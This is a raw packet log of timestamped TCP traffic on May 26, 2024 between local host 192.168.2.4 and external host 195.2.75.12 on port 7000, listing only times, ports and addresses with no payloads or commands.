May 26, 2024 01:21:23.992561102 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.992573977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.992647886 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.993746996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.993762016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.993906021 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.994961023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.995527029 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.995817900 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.996124983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.996140957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.996155977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.996335030 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.997364998 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.997380972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.997421026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.999069929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.999084949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.999125957 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.999742031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.999757051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.999792099 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.000698090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.000715017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.000729084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.000787973 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.000788927 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.001674891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.001691103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.001771927 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.002625942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.002641916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.002712011 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.003655910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.003669977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.003794909 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.004524946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.004539967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.004592896 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.006114960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.006130934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.006144047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.006192923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.038697004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.038865089 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.111531019 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.111824989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.112090111 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.112377882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.112799883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.112813950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.112828970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.112967014 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.113766909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.114308119 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.114324093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.114440918 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.115320921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.115338087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.115407944 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.116322041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.116485119 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.116820097 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.116836071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.116848946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.116977930 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.117839098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.117855072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.117921114 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.118819952 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.118834972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.119003057 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.119857073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.119875908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.119918108 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.120865107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.120881081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.120925903 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.121871948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.121887922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.121902943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.121928930 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.121962070 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.122899055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.122915983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.122972012 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.123887062 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.123902082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.123963118 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.124908924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.124924898 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.124995947 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.125894070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.125910997 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.125925064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.125977993 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.126804113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.126818895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.126858950 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.127721071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.127737999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.127793074 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.128642082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.128658056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.128674030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.128717899 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.128766060 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.202322960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.202572107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.202789068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.203037977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.203054905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.203145981 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.203965902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.204437971 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.204453945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.204580069 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.207076073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.207146883 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.232150078 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.232317924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.232620001 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.232718945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.232733965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.232748032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.232809067 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.233453989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.233469963 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.233544111 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.234209061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.234225035 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.234344006 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.234982967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.235054970 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.235281944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.235297918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.235311985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.235352039 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.236032963 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.236047983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.236087084 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.236763000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.236778975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.236793041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.236840010 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.236871958 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.237515926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.237531900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.237636089 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.238328934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.238347054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.238507986 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.239020109 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.239036083 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.239094973 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.239716053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.239732981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.239747047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.239784956 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.240462065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.240478039 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.240518093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.241198063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.241214037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.241250992 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.241938114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.241954088 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.241988897 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.242666006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.242682934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.242719889 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.243402004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.243418932 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.243433952 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.243462086 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.243494987 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.244149923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.244164944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.244230032 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.244879007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.244894981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.245649099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.245670080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.245682001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.245697021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.245711088 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.245760918 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.246571064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.246586084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.246599913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.246614933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.246654987 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.246686935 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.247440100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.247456074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.247469902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.247509956 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.248342037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.248358011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.248372078 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.248399973 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.248433113 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.249263048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.249278069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.249291897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.249306917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.249353886 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.249392986 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.250094891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.250288963 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.250597000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.250649929 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.250880003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.250926971 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.251189947 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.251519918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.251535892 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.251549959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.251564980 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.251574993 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.251606941 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.252331972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.252648115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.252662897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.252676964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.252702951 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.252741098 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.253415108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.253469944 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.253726959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.253742933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.253757954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.253772974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.253880978 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.254545927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.254563093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.254576921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.254641056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.255275965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.255332947 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.256185055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.256316900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.256377935 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.256573915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.256809950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.256824017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.256877899 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.257072926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.257088900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.257128000 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.260953903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.260967970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.261245966 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.290672064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.291712999 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.352724075 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.353161097 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.353245020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.353276014 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.353493929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.353511095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.353523970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.353539944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.353565931 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.353600979 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.354367018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.354382992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.354398012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.354418993 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.354474068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.355187893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.355489969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.355504036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.355519056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.355557919 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.355590105 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.356373072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.356400013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.356420994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.356443882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.356471062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.356499910 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.357204914 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.357230902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.357284069 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.357795000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.357826948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.357858896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.357909918 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.358666897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.358695030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.358716011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.358737946 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.358743906 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.358773947 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.359532118 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.359558105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.359580040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.359601974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.359612942 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.359632015 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.360397100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.360421896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.360471964 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.360538960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.360629082 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.361120939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.361140013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.361156940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.361171961 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.361273050 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.361995935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.362011909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.362026930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.362041950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.362056017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.362093925 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.362910032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.362926960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.363060951 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.366915941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.367157936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.367269993 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.367288113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.367301941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.367316961 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.367364883 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.367450953 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.367451906 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.367916107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.367932081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.367945910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.367960930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.368112087 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.368772984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.368834019 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.369090080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.369105101 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.369119883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.369134903 CEST	7000	49730	195.2.75.12	192.168.2.4
